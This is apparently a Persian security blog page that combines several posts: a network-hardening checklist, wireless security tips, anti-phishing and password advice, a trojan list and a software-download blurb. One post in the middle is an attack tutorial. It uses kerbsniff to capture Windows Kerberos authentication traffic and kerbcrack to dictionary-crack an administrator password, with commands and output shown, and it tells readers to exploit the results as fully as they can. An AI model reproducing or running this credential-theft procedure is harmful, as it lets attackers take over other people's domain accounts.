امنیت شبکه

امنیت شبکه ها

وقتی بحث امنیت شبکه پیش می اید ، مباحث زیادی قابل طرح و ارائه هستند ، موضوعاتی که هر کدام به تنهایی می توانند جالب ، پرمحتوا و قابل درک باشند ، اما وقتی صحبت کار عملی به میان می اید ، قضیه یک جورایی پیچیده می شود . ترکیب علم و عمل ، احتیاج به تجربه دارد و نهایت هدف یک علم هم ، به کار امدن ان هست .

وقتی دوره تئوری امنیت شبکه را با موفقیت پشت سر گذاشتید و وارد محیط کار شدید ، ممکن است این سوال برایتان مطرح شود که " خب ، حالا از کجا شروع کنم ؟ اول کجا را ایمن کنم ؟ چه استراتژی را پیش بگیرم و کجا کار را تمام کنم ؟ " انبوهی از این قبیل سوالات فکر شما را مشغول می کند و کم کم حس می کنید که تجربه کافی ندارید و این البته حسی طبیعی هست . پس اگر این حس رو دارید و می خواهید یک استراتژی علمی - کاربردی داشته باشید ، تا انتهای این مقاله با من باشید تا قدم به قدم شما رو به امنیت بیشتر نزدیک کنم.

همیشه در امنیت شبکه موضوع لایه های دفاعی ، موضوع داغی هست و نظرات مختلفی وجود دارد . عده ای فایروال را اولین لایه دفاعی می دانند ، بعضی ها هم Access List رو اولین لایه دفاعی می دانند ، اما واقعیت پنهان این هست که هیچکدام از اینها ، اولین لایه دفاعی نیستند . یادتون باشد که اولین لایه دفاعی در امنیت شبکه و حتی امنیت فیزیکی ، Policy هست . بدون policy ، لیست کنترل ، فایروال و هر لایه دیگر ، بدون معنی می شود و اگر بدون policy شروع به ایمن کردن شبکه کنید ، محصول یک آبکش واقعی از کار در می اید .

با این مقدمه ، و با توجه به این که شما policy مورد نظرتان را کاملا تجزیه و تحلیل کردید و دقیقا می دانید که چه چیزی رو می خواهید و چی را احتیاج ندارید ، کار را شروع می کنیم . ما باید پنج مرحله رو پشت سر بگذاریم تا کارمان تمام بشود . این پنج مرحله عبارتند از :

1- Inspection ( بازرسی )

2- Protection ( حفاظت )

3- Detection ( ردیابی )

4- Reaction ( واکنش )

5- Reflection ( بازتاب)

در طول مسیر ، از این پنج مرحله عبور می کنیم ، ضمن اینکه ایمن کردن شبکه به این شکل ، احتیاج به تیم امنیتی دارد و یک نفر به تنهایی نمی تواند این پروسه رو طی کند و اگر هم بتواند ، خیلی طولانی می شود و قانون حداقل زمان ممکن را نقض می کند .

1- اولین جایی که ایمن کردن رو شروع می کنیم ، ایمن کردن کلیه authentication های موجود هست . معمولا رایج ترین روش authentication که مورد استفاده قرار می گیرد ، استفاده از شناسه کاربری و کلمه رمز هست.

مهمترین جاهایی که باید authentication را ایمن و محکم کرد عبارتند از :

- کلمات عبور کاربران ، به ویژه مدیران سیستم .

- کلمات عبور سوییچ و روتر ها ( من روی سوییچ خیلی تاکید میکنم ، چون این device به صورت plug and play کار می کند ، اکثر مدیرهای شبکه از config کردن ان غافل می شوند ، در حالی که می تواند امنیت خیلی خوبی به شبکه بدهد ، به مدیران امنیتی توصیه میکنم که حتما این device رو کنترل کنند ) .

- کلمات عبور مربوط به SNMP .

- کلمات عبور مربوط به پرینت سرور .

- کلمات عبور مربوط به محافظ صفحه نمایش .

آنچه که شما در کلاسهای امنیت شبکه در مورد Account and Password Security یاد گرفتید را اینجا به کار می برید . که من به خاطر طولانی نشدن بحث به انها اشاره نمیکنم .

2- قدم دوم نصب و به روز کردن آنتی ویروس بر روی همه دسکتاپ ، سرور و میل سرورها هست . ضمن اینکه آنتی ویروس های مربوط به کاربران باید به طور اتوماتیک به روز رسانی بشود و آموزشهای لازم در مورد فایلهای ضمیمه ایمیل ها و راهنمایی لازم جهت اقدام صحیح در صورت مشاهده موارد مشکوک یا اضطراری به کاربران هم داده بشود .

3 - مرحله سوم شامل نصب آخرین به روز رسانی های امنیتی سیستم عامل و سرویسهای موجود هست . در این مرحله علاوه بر کارهای ذکر شده ، کلیه سرورها و device ها و دسک تاپ ها با ابزار های شناسایی حفره های امنیتی بررسی می شوند تا علاوه بر شناسایی و رفع حفره های امنیتی ، سرویس های غیر ضروری هم شناسایی و غیرفعال بشوند .

4-در این مرحله نوبت گروه بندی کاربران و اعطای مجوزهای لازم به فایلها و دایرکتوری ها میباشد . ضمن اینکه account های قدیمی هم باید غیر فعال شوند . گروه بندی و اعطای مجوز بر اساس یکی از سه مدل استاندارد Access Control Techniques یعنی MAC , DAC یا RBAC انجام می شود . بعد از پایان این مرحله ، یک بار دیگه امنیت سیستم عامل باید چک بشود تا چیزی فراموش نشده باشد .

5- حالا نوبت device ها هست که معمولا شامل روتر ، سوییچ و فایروال می شود . بر اساس policy موجود و توپولوژی شبکه ، این box ها باید config بشوند . تکنولوژی هایی مثل NAT , PAT و filtering و غیره در این مرحله مطرح می شود و بر همین اساس این مرحله خیلی مهم هست. حتی موضوع مهم IP Addressing که از وظایف مدیران شبکه هست می تواند مورد توجه قرار بگیرد تا اطمینان حاصل بشود که از حداقل ممکن برای IP Assign به شبکه ها استفاده شده است.

6- قدم بعد تعیین استراژی backup گیری هست . نکته مهم که اینجا وجود دارد این هست که باید مطمئن بشویم که سیستم backup گیری و بازیابی به درستی کار می کند و بهترین حالت ممکن باشد .

7- امنیت فیزیکی . اول از همه به سراغ UPS ها می رویم . باید چک کنیم که UPS ها قدرت لازم رو برای تامین نیروی الکتریکی لازم جهت کار کرد صحیح سخت افزار های اتاق سرور در زمان اضطراری رو داشته باشند . نکات بعدی شامل کنترل درجه حرارت و میزان رطوبت هست. همینطور ایمنی در برابر سرقت و آتش سوزی. سیستم کنترل حریق باید به شکلی باشد که به نیروی انسانی و سیستم های الکترونیکی آسیب وارد نکند . به طور کل آنچه که در مورد امنیت فیزیکی یاد گرفتید را در این مرحله به کار می برید .

8- امنیت وب سرور یکی از موضوعاتی هست که روش باید وسواس داشته باشید. به همین دلیل در این قسمت کار ، مجددا و با دقت بیشتر وب سرور رو چک و ایمن می کنیم . در حقیقت ، امنیت وب رو اینجا لحاظ می کنیم .

( اسکریپت های سمت سرویس دهنده رو هیج وقت فراموش نکنید )

9 - حالا نوبت چک ، تنظیم و تست سیستم های Auditing و Logging هست . این سیستم ها هم می تواند بر پایه host و هم بر پایه network باشد . سیستم های رد گیری و ثبت حملات هم در این مرحله نصب و تنظیم می شوند. باید مطمئن شوید که تمام اطلاعات لازم ثبت و به خوبی محافظت می شود . در ضمن ساعت و تاریخ سیستم ها درست باشد ، مبادا که اشتباه باشه که تمام زحماتتان در این مرحله به باد میرود . و امکان پیگیری های قانونی در صورت لزوم دیگر وجود ندارد .

10- ایمن کردن Remote Access با پروتکل ها و تکنولوژی های ایمن و Secure قدم بعدی رو تشکیل می دهد. در این زمینه با توجه به شرایط و امکانات ، ایمن ترین پروتکل و تکنولوژی ها رو به خدمت بگیرید .

11 - نصب فایروال های شخصی در سطح host ها ، لایه امنیتی مضاعفی به شبکه شما میدهد . پس این مرحله رو فراموش نکنید .

12 - شرایط بازیابی در حالت های اضطراری رو حتما چک و بهینه کنید . این حالت ها شامل خرابی قطعات کامپیوتری ، خرابکاری کاربران عادی ، خرابی ناشی از بلایای طبیعی ( زلزله - آتش سوزی - افتادن - سرقت - سیل و ... ) و خرابکاری ناشی از نفوذ هکرها ، میباشد . استاندارد های warm site و hot site را در صورت امکان رعایت کنید.

یادتون باشد که " همیشه در دسترس بودن اطلاعات " ، جز، قوانین اصلی امنیتی هست .

13- و قدم آخر این پروسه که در حقیقت شروع یک جریان همیشگی هست ، عضو شدن در سایتها و بولتن های امنیتی و در جریان آخرین اخبار امنیتی قرار گرفتن هست .

همیشه یکی از مشکلات کاربران اینترنت ، امنیت می باشد و دوست دارند که بتوانند آسوده خاطر در اینترنت گشت و گذار کنند.

نرم افزار F-Secure Internet Security 2007 وظیفه ی تامین امنیت شما در اینترنت را بر عهده دارد.

برخی از امکانات و قابلیت های این نرم افزار :

• محافظت از کامپیوتر شما هنگام گشت و گذار در اینترنت
• جلوگیری از حملات هر گونه ویروس و کرم های اینترنتی
• تامین امنیت سیستم شما در هنگام گشت و گذار در اینترنت

مناسب جهت سیستم عامل های :

- Windows XP Home Edition
- Windows XP Professional
- Windows 2000 (Workstation only)

• حجم : 81.6 مگابایت

• لینک دانلود F-Secure Internet Security 2007 v7.02 Build 395

در قسمت قبلي 5 نكته براي بهبود امنيت شبكه بي سيم ارائه شد. در اين قسمت 5 نكته ديگر را مورد بررسي قرار مي دهيم...

 

 

در قسمت قبلي 5 نكته براي بهبود امنيت شبكه بي سيم ارائه شد. در اين قسمت 5 نكته ديگر را مورد بررسي قرار مي دهيم.

 

 

 

 

 

 

 

 

 

 

۶. به شبكه هاي WiFi باز وصل نشويد.

مطمئن شويد كه تنظيمات سيستم به گونه‌اي است كه مانع اتصال خودكار به نقاط دسترسي ناامن شود.

اتصال به يك شبكه WiFi باز مثل يك hotspot يا مسيرياب بي‌سيم آزاد، كامپيوتر شما را در معرض خطرات فراواني قرار مي دهد. هرچند به طور معمول اين امكان فعال نيست ولي اغلب كامپيوترها داراي تنظيماتي هستند كه امكان اتصال خودكار بدون اطلاع كاربر را فراهم مي‌كنند. اين تنظيمات به‌جز در موارد ضروري و به‌طور موقت  نبايد فعال باشد.

براي بررسي اين‌كه آيا اتصال خودكار به شبكه‌هاي WiFi باز، مجاز است يا نه، تنظيمات بي‌سيم كامپيوتر را بررسي كنيد. براي مثال در كامپيوترهايي كه داراي Windows XP هستند، تنظيمات بي‌سيم Automatically connect to non-preferred networks ناميده مي‌شود. براي بررسي مراحل زير را انجام دهيد:

·          از منوي start به گزينه Windows Control Panel برويد.

·          به گزينه Network Connections برويد

·          بر روي Wireless Network Connection كليك راست كنيد و گزينه Properties را انتخاب كنيد.

·          روي گزينه Wireless Networks كليك كنيد.

·          بر روي دكمه Advanced كليك كنيد.

·          گزينه Automatically connect to non-preferred networks را پيدا كنيد، اگر انتخاب شده بود اين تنظيمات فعال است در غير اين صورت غيرفعال است.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

اگرچه در Windows XP به‌طور پيش فرض Automatically connect to non-preferred networks  فعال نيست، برخي كاربران براي سهولت اتصال به شبكه خودشان آن را فعال مي‌كنند. كاربران بايد شبكه خودشان را به عنوان Windows XP Preferred networks تنظيم كنند كه اجازه اتصال خودكار را مي‌دهد و اتصال خودكار به بقيه شبكه‌ها را غيرفعال كنند. 

 

۷. به تجهيزات آدرس (IP) ايستا اختصاص دهيد.

اختصاص آدرس ايستا جايگزيني براي پروتكل DHCP است. اختصاص آدرس پويا با استفاده از DHCP راحت تر است و هم چنين به كامپيوترهاي سيار اجازه مي دهد كه بين شبكه هاي مختلف جابه جا شوند.

آدرس دهي ايستا نيز مزايايي دارد، از جمله:

·       آدرس ثابت ترجمه آدرس را بهتر پشتيباني مي كند، بنابراين يك كامپيوتر روي شبكه با نام دامنه اش به طور مطمئن قابل دستيابي است. مخصوصا سرورهايي مثل سرور وب و سرور FTP بهتر است آدرس ايستا داشته باشند.

·          استفاده از آدرس دهي ايستا در مقابل DHCP محافظت بيشتري در برابر حملات امنيتي فراهم مي كند.

·          برخي تجهيزات شبكه پروتكل DHCP را پشتيباني نمي كنند.

·          استفاده از آدرس دهي ايستا براي تمام اجزاي شبكه تضمين مي كند كه ناسازگاري آدرس ها رخ نمي دهد.

آدرس هاي ايستا بايد از محدوده آدرس هاي خصوصي استاندارد انتخاب شود از جمله:

·          "10.0.0.0" تا "10.255.255.255"

·          "172.16.0.0" تا "172.31.255.255"

·          "192.168.0.0" تا "192.168.255.255"

اين محدوده ها تعداد زيادي آدرس را پشتيباني مي كنند. برخلاف تصور اكثر افراد، تمام آدرس هاي اين محدوده ها نمي توانند انتخاب شوند. براي انتخاب آدرس درست نكات زير را مدنظر داشته باشد:

1.       آدرس هايي كه با "0" يا "255" تمام مي شوند را انتخاب نكنيد. اين آدرس ها برا ي استفاده پروتكل هاي شبكه رزرو شده اند.

2.     آدرس هاي ابتداي يك محدود آدرس خصوصي را انتخاب نكنيد. آدرس هايي مثل "10.0.0.1" يا "192.168.0.1" معمولا به مسيرياب ها ي شبكه اختصاص مي يابند. اين آدرس ها اولين آدرس هايي هستند كه معمولا يك نفوذگر تلاش مي كند به آن ها نفوذ كند، بنابراين بهتر است از آن ها استفاده نكنيد.

3.     از آدرس هايي كه خارج از محدوده mask شبكه شما مي باشد استفاده نكنيد. براي مثال، براي پشتيباني تمام آدرس هاي محدوده "10.x.x.x"، mask شبكه براي تمام سيستم ها بايد به "255.0.0.0" تنظيم شود، در غيراين صورت برخي آدرس هاي ايستاي اين محدوده كار نمي كنند.

 

۸. قابليت فايروال را روي تمام كامپيوترها و مسيرياب‌ها فعال كنيد

يكي از آسان ترين و ارزان ترين راه ها براي محافظت از شبكه در برابر حملات استفاده از فايروال شخصي است.  

 

۹. مسيرياب‌ها و نقاط دسترسي را در مكان‌هاي امن قرار دهيد

كارآيي شبكه Wi-Fi به ميزان زيادي بستگي به قدرت سيگنال مسيرياب يا نقطه دسترسي بي سيم دارد. اگر يك client بي سيم خارج از محدوده قدرت سيگنال قرار بگيرد ارتباط آن با شبكه قطع مي شود يا ارتباط بسيار ضعيف مي‌باشد. Clientهاي بي سيم واقع شده در لبه شبكه ممكن است به دفعات زياد ارتباطشان قطع شود، ولي حتي زماني كه يك Client بي سيم در محدوده قدرت سيگنال هم باشد، كارآيي شبكه از مواردي همچون فاصله، انسداد، يا تداخل تاثير مي گيرد.

براي تعيين محل قرار گرفتن تجهيزات بي سيم نكات زير را مدنظر داشته باشد:

·       اولين و مهم ترين نكته اين است كه، از قبل جايي را براي مسيرياب يا نقطه دسترسي بي سيم در نظر نگيريد. سعي كنيد تجهيزات را در چندين نقطه متفاوت امتحان كنيد. با وجود اين كه روش آزمون و خطا راهكار علمي براي يافتن محل قرارگيري تجهيزات بي سيم نيست اما از ديدگاه عملي بهترين روش براي به دست آوردن حداكثر كارآيي است.

·       سعي كنيد مسيرياب يا نقطه دسترسي بي سيم را نزديك به مركز قرار دهيد. Clientهايي كه از ايستگاه مركزي فاصله بيشتري دارند، در مقايسه با Clientهايي كه نزديك ايستگاه مركزي هستند ، فقط از 10 تا 50 درصد پهناي باند بهره مند مي شوند.

·       تا حدامكان سعي كنيد از موانع فيزيكي دوري كنيد. هرگونه مانعي در فاصله خط ديد بين Client و ايستگاه مركزي باعث كاهش قدرت سيگنال مي شود. ديوارهاي آجري، خشتي، يا ساروج اندود بيش ترين تاثير منفي را دارند ولي موانع ديگر نيز باعث كاهش قدرت سيگنال مي شوند.

·       تا حد امكان از سطوح بازتابي اجتناب كنيد. برخي سطوح بازتابي مثل پنجره ها، آينه ها و ... باعث كاهش محدوده قدرت سيگنال هاي WiFi و در نتيجه كارآيي شبكه مي شود.

·       مسيرياب يا نقطه دسترسي بي سيم را حداقل به فاصله يك متر از ديگر تجهيزاتي كه در محدوده فركانس مشابه سيگنال بي سيم مي فرستند قرار دهيد. اين ابزارها مي تواند شامل تلفن بي سيم، اجاق هاي مايكروويو و ... باشد.

·          همچنين مسيرياب يا نقطه دسترسي بي سيم را دور از تجهيزات الكتريكي كه باعث ايجاد تداخل مي شوند قرار دهيد.

·       اگر مكان مناسبي كه پيدا كرديد فقط به طور مرزي قابل قبول شود، آنتن هاي ايستگاه مركزي را براي بهبود كارآيي تنظيم كنيد. مي توانيد آنتن هاي مسيرياب و نقاط دسترسي بي سيم را بچرخانيد و محل آن را تغيير دهيد، دستورالعمل هاي كارخانه سازنده را اعمال كنيد تا بهترين كارآيي را به دست آوريد.

اگر با استفاده از اين نكات و دستورالعمل ها باز هم مشكل داريد، مي توانيد به عنوان مثال آنتن هاي خود را تغيير دهيد، يك تكراركننده نصب كنيد، يا در مواردي ايستگاه مركزي ديگري پيكربندي و استفاده كنيد.

 

۱۰. در فواصل زماني طولاني كه از شبكه استفاده نمي‌كنيد تجهيزات را خاموش كنيد.

اغلب ارتباطات اينترنت باندپهن هميشه برخط هستند. به همين خاطر دارندگان شبكه ترجيح مي دهند اكثر تجهيزات شبكه مثل مسيرياب يا مودم روشن بماند حتي اگر براي مدت هاي طولاني بدون استفاده باشند.

ولي آيا شبكه هاي محلي هم لازم است هميشه روشن بمانند؟ خاموش كردن تجهيزات شبكه چه مزايا و معايبي دارد؟

در ادامه برخي از مزايا و معايب خاموش كردن تجهيزات شبكه را هنگامي كه استفاده اي از آن ها نمي شود، بررسي مي كنيم:

امنيت: خاموش كردن تجهيزات شبكه زماني كه در حال استفاده نيستند، باعث افزايش امنيت شبكه مي شود. زماني كه تجهيزات شبكه خاموش باشند نفوذگران قادر به انجام كاري نيستند.

صرفه جويي در مصرف برق: خاموش كردن تجهيزات شبكه باعث صرفه جويي در هزينه ها مي شود. در برخي كشورها اين صرفه جويي چندان قابل توجه نيست اما در برخي كشورها نيز به علت بالا بودن هزينه انرژي ميزان قابل توجهي است.

محافظت در برابر اعوجاج سيگنال: جدا كردن تجهيزات شبكه باعث جلوگيري از خرابي هاي احتمالي منتج از اعوجاج سيگنال مي شود. ممكن است گفته شود كه محافظ ها هم قادرند از ابزارها در برابر اعوجاج مراقبت كنند ولي اين محافظ ها به خصوص انواع ارزان قيمت آن قادر به مراقبت در برابر نوسانات شديد نيستند.

قابليت اطمينان سخت افزار: قطع و وصل مدام منبع انرژي تجهيزات شبكه باعث كاهش طول عمر آن ها مي شود. ديسك درايوها اغلب آسيب پذير هستند. به عبارت ديگر، دماي زياد هم باعث كاهش طول همه ابزارهاي شبكه مي شود. هميشه روشن گذاشتن تجهيزات شبكه در مقايسه با زماني كه تجهيزات گهگاه خاموش مي شوند، احتمالا باعث آسيب هاي بيش تري مي شود. 

قابليت اطمينان ارتباطات: بعد از خاموش و روشن كردن تجهيزات ممكن است فرآيند برقراري ارتباط مجدد با خطا مواجه شود. بايد فرآيند راه اندازي مجدد را با احتياط دنبال كنيد. به عنوان مثال بايد ابتدا مودم هاي باندپهن روشن شوند و ابزارهاي ديگر پس از اين كه مودم آماده شد، روشن شوند. همچنين اگر هنگام راه اندازي يا نصب با خطايي مواجه مي شويد حتما راه حلي براي آن پيدا كنيد در غيراين صورت ممكن است در آينده منجر به مشكلات بزرگ تري شود.

سهولت: تجهيزات شبكه مثل مسيرياب بي سيم يا مودم ممكن است در مكان هايي مثل سقف يا مكان هايي كه دسترسي به آن ها سخت است قرار داشته باشد. هنگام خاموش كردن اين تجهيزات احتياط نموده و به جاي استفاده از دكمه خاموش و روشن كردن تجهيزات، رويه هاي توصيه شده توسط كارخانه سازنده را حتما رعايت كنيد.

به طور خلاصه با درنظر گرفتن ملاحظات فوق الذكر پيشنهاد مي شود كه در زمان هايي كه از شبكه استفاده نمي كنيد تجهيزات را خاموش كنيد. مزاياي امنيتي آن به تنهايي كافي است تا اين كار را انجام دهيم.

++ استراق سمع در هنگام تعیین  هویت ویندوز !!

 

شرح کار :

 

کار بسیار ساده است اول میروید به Ntsecurity.nu و دو ابزار  kerbcrack و kerbsniff را دریافت می نمایید . ابزار kerbsniff شبکه را تحت نظر می گیرد و به دنبال اطلاعات تعیین هویت حوزه Kerberos و ، ویندوز میگردد و نتایج را در فایلی که شما برایش مشخص میکنید ذخیره میکند !! بعد با استفاده از ابزار  ورود به زور و با استفاده از یک فرهنگ لغت ابزار kerbcrack را راه اندازی میکنیم تا به هدف خود که همان کلمات عبور باشد دست پیدا کنیم .

 

+ مراحل استفاده از ابزار kerbsniff به شرح زیر است :

 

1. خود ابزار را راه اندازی میکنیم  ، ابزار شبکه های فعال را تشخیص میدهد و آنها را به ما نمایش میدهد . شما باید یکی از آن ها را انتخاب کنید که من شماره 1  انتخاب کردم !!

 

D:\> KerbSniff.exe zxo003.txt

KerbSniff 1.3d3 - (c) 2002-2005, Arne Vidstrom

                      - http://ntsecurity.nu/toolbox/kerbcrack/

 

Available network adapters:

 

0-      192.168.234.34

1-      192.168.234.33

2-      192.168.208.1

4-   192.168.223.1

 

Select the network adapter to sniff on: 1

 

 

2. حال بر نامه فعال شده و همینجور نیز فعال می ماند ، بعد از مدتی شما بهتر است که ترکیب دو کلید Ctrl+C را استفاده کنید تا برنامه ناکام بماند و شما بتوانید از نتایج بدست آماده حداکثر سوء استفاده را بکنید ، البته اگر چیزی به دست بی آورد !! حالا ما دیگه کاری با این ابزار نداریم

 

++ مراحل استفاده از ابزار kerbcrack به شرح زیر است :

 

1. این  ابزار مثل بقیه ابزار های از این دست است و بر پایه متد ورود به زور کار میکند ، شیوه استفاده به این صورت زیر است .

 

D:\> Kerbcrack.exe zxo003.txt –d dicitionary.txt

KerbCrack 1.3d3 - (c) 2002-2005, Arne Vidstrom

                       - http://ntsecurity.nu/toolbox/kerbcrack/

 

Loaded capture file.

 

Currently working on :

 

Account name                -administrator

From domain                 -VEGAS2

Trying password            -admin

Trying password            -guest

Trying password            -root

 

2. قابل ذکر است که آخرین کلمه که نمایش میدهد و دیگر تلاش نمی کند آن کلمه ، همان کلمه عبور است .

 

3. این برنامه یک سری ریزه کاری های دارد خود شما باید آن یاد بگیرید !!

 

 

+ موفق باشید

            ..::ZXO003::..

تروجان Dloadr-BGI	20 آذر
تروجان Agent-GIQ	20 آذر
تروجان Mailbot-CI	19 آذر
تروجان StartP-W	19 آذر
تروجان PPntDrop-A	19 آذر

هک نشوید!

متاسفانه این روزها بارها و بارها دیده می‌شود که تعدادی از وبلاگها و سایتها با روشهای فریبکاری اجتماعی و چند شیوه تکنیکی و روانشناسی ساده مورد حمله هکرها واقع می‌شوند. رعایت این توصیه‌های ساده ولی مهم می‌تواند تا حد زیادی جلوی چنین اتفاقی را بگیرد. این توصیه‌ها تضمین نمی‌کند که با رعایت آنها هرگز هک نخواهید شد، همیشه ممکن است یک سایت به دلیل نقایص امنیتی هک شود، ولی این دلیل نمی‌شود که پسورد خود را دو دستی در اختیار شیادان قرار دهید!



1- گول ایمیلهای قلابی را نخورید.

هرگز و تحت هیچ شرایطی مدیران سایت بلاگر، بلاگ‌اسپات، پرشین‌بلاگ، یاهو،Hotmail و دیگر سایتهای سرویس دهنده ایمیل و وبلاگ از شما پسوردتان را نمی‌خواهند. اگر خود بیل گیتس هم با امضا و اثر انگشت خودش برای شما ایمیل زد یا نامه فرستاد یا شخصاً به در منزل شما آمد و به علت به‌روز رسانی یا هر دلیل دیگری پسورد شما را خواست، شک نکنید که ایمیل جعلی و قلابی است و شخصی که جلوی در منزل شما آمده است را تحویل پلیس دهید! مدیران پرشین‌بلاگ و یاهو و بلاگر احتیاجی به دریافت پسورد شما برای تایید هیچ چیزی ندارند. هر ایمیلی که چنین درخواستی از شما داشت را حتی اگر از آدرس admin@blogger.com یا mailing_services@yahoo.com یا مثلاً ata@persianblog.com برای شما فرستاده شده بود، بدون کوچکترین شکی نادیده بگیرید.

همچنین اگر ایمیلی دریافت کردید که هنگام باز کردن آن با صفحه‌ای مواجه شدید که از شما می‌خواست به هر علت مجدداً در همان صفحه login کنید، بدون تردید از انجام این کار خودداری کنید.



2- در صفحه‌های مشکوک Login نکنید.

به جز صفحه اصلی سایتی که از سرویس ایمیل یا وبلاگ آن استفاده می‌کنید، در هیچ صفحه دیگری Login نکنید. یکی از روشهای مرسوم برای به دست آوردن پسورد اشخاص ساختن صفحه‌ای شبیه یاهو یا بلاگر است که هر کس پسورد خود را در آن وارد کند بلافاصله سر از ایمیل شخص هکر در می‌آورد. دقت کنید که به عنوان مثال www.blogger.tk یا yahoo.8m.com آدرسهای واقعی بلاگر و یاهو نیستند. همیشه به آدرس سایتی که وارد آن شده‌اید توجه کنید و هرگز از آدرسهای ناآشنا یا مشکوکی که برای شما فرستاده می‌شود برای ورود به وبلاگ یا ایمیل خود استفاده نکنید.



3- مراقب ضمیمه ایمیلها باشید.

ضمیمه یک ایمیل را حتی اگر از جانب نزدیک‌ترین دوستتان ارسال شده باشد بدون بررسی توسط یک آنتی‌ویروس به روز شده باز نکنید. از باز کردن ایمیلهایی که ضمیمه‌ای با پسوند exe , com , pif , scr , vbs و سایر پسوندهای اجرایی دارند به طور کلی خودداری کنید. فایلهای zip شده را قبل از باز کردن توسط آنتی‌ویروستان بررسی کنید. فایلهای عکس حتماً باید با یکی از پسوندهای JPG , GIF , TIFF , PNG یا BMP ختم شوند. فایلی با نام مشابه Picture.jpg.exe بدون هیچ تردیدی یک تروجان یا ویروس است. اگر از یاهو یا Hotmail استفاده می‌کنید حتماً قبل از دریافت فایل ضمیمه، اجازه دهید آنتی‌ویروس خودِ سایت، فایل را بررسی کند. تحت هیچ شرایطی بدون داشتن یک آنتی‌ویروس به روز شده و مطمئن در کامپیوترتان، از برنامه Outlook یا Outlook Express برای ارسال و دریافت ایمیل استفاده نکنید. دقت کنید که حتماً برنامه آنتی‌ویروستان به روز شده باشد و طوری تنظیم شده باشد که ایمیلها را قبل از دریافت بررسی کند. همیشه آخرین اصلاحات ویندوز و Outlook یا Outlook Express را از سایت مایکروسافت دریافت کنید. این کار را عقب نندازید!



4- فایل مشکوک را اجرا نکنید.

اگر هنگام چت کردن کسی برای شما فایلی فرستاد بدون بررسی توسط یک آنتی‌ویروس مطمئن از اجرای آن خودداری کنید. از دریافت فایلهایی با پسوند exe , com , pif , scr , vbs همیشه و تحت هر شرایطی خودداری کنید. حتی از نزدیکترین دوستتان هم چنین فایلهایی دریافت نکنید چون خود او ممکن است هک شده باشد یا ناآگاهانه اقدام به ارسال ویروس یا تروجان کند.



5- پسورد مناسب انتخاب کنید.

نام پدر و مادر، تاریخ تولد، نام کوچه یا خیابان، نام دوستان و آشنایان دور یا نزدیک، 123456789 ، کلمات زیر 6 حرف و کلمات معنی‌دار انگلیسی یا فارسی بدترین پسوردهای ممکن هستند.
I LOVE YOU یا کامبیز یا حسین جزو اولین کلماتی هستند که یک هکر بررسی می‌کند. در انتخاب پسورد سعی کنید همیشه از ترکیب حروف بزرگ و کوچک و اعداد بی‌معنی یا ترکیب جمله‌های طولانی با اعداد و حروف دیگر که فقط برای شخص شما معنی خواهد داشت استفاده کنید. از انتخاب پسوردهای طولانی نترسید!
جمله "ChenIn#gOft ferDosie$756pAkzad" به عنوان یک پسورد، در عین سادگی در به خاطر سپردن آن، یک هکر را به شدت به دردسر می‌اندازد. سعی کنید از بیشترین حد مُجازی که هر سایت برای کلمه‌های عبود در نظر می‌گیرد استفاده کنید.



6- با نامی متفاوت با نام وبلاگتان Login کنید.

به هیچ وجه نامی که برای ثبت نام در بلاگر یا پرشین‌بلاگ استفاده می‌کنید را مشابه آدرس وبلاگ خودتان انتخاب نکنید. اگر آدرس وبلاگ شما iman.blogspot.com باشد،UserName تان باید هر کلمه‌ای باشد به جز ایمان و مشتقات آن! با ایمیلی که از آن برای ثبت نام در بلاگر یا پرشین‌بلاگ استفاده‌ کرده‌اید، چت نکنید و آن را در وبلاگتان قرار ندهید. همیشه لااقل دو ایمیل با پسوردهای متفاوت داشته باشید که از یکی برای کارهای روزمره و ارتباط با دوستان، و از دیگری برای ثبت نام در سایتها استفاده کنید. دلیلی ندارد که همه دوستان شما ایمیل دیگر شما را هم بدانند. هنگام ثبت نام در سایتهای بلاگر یا پرشین بلاگ، از پسوردی متفاوت با پسورد ایمیلتان استفاده کنید.



7- کلمه امنیتی بازیابی پسوردتان را به خاطر بسپارید.

هنگام ثبت یک ایمیل در یاهو یا Hotmail تاریخ تولد و کد پستی و کلمه امنیتی‌ای که برای بازیابی پسورد فراموش شده وارد می‌کنید را به خاطر بسپارید.



8- به هیچ فرمی اعتماد نکنید.

به جز سایت اصلی یاهو و Hotmail و بلاگر و پرشین‌بلاگ، در هیچ فرمی پسورد خودتان را وارد نکنید. اگر جایی فرمی دیدید که ادعا می‌شد با وارد کردن User Name و پسوردتان مثلاً به شما 8 مگابایت فضای اضافی می‌داد یا ایمیل شما را به کلی حذف می‌کرد یا هر امکان مشابه دیگر، شک نکنید که تنها کار آن فرم ارسال پسورد شما به شخص هکر است! اگر جایی دیدید که با دریافت پسورد و User Name شما و User Name دوستتان، پسورد او را برای شما پیدا می‌کنند گول نخورید! تنها کاری که انجام خواهد شد ارسال پسورد شما به یک هکر است.



9- از کامپیوترهای عمومی پرهیز کنید.

تا حد امکان در کافی‌نتها و مکانهای عمومی با ایمیل اصلیتان Login نکنید و از User Name و پسورد وبلاگتان استفاده نکنید. احتمال آلودگی کامپیوترهای کافی‌نتها و کامپیوترهایی که افراد متعددی به آنها دسترسی دارند، به تروجانها یا برنامه‌های ثبت کلیدهای فشار داده شده بسیار بالا است. حتی کامپیوتر دوستتان هم ممکن است آلوده به یکی از این برنامه‌ها باشد. اگر وبلاگ یا حساب ایمیلتان برای شما مهم است از کامپیوترهای عمومی دوری کنید.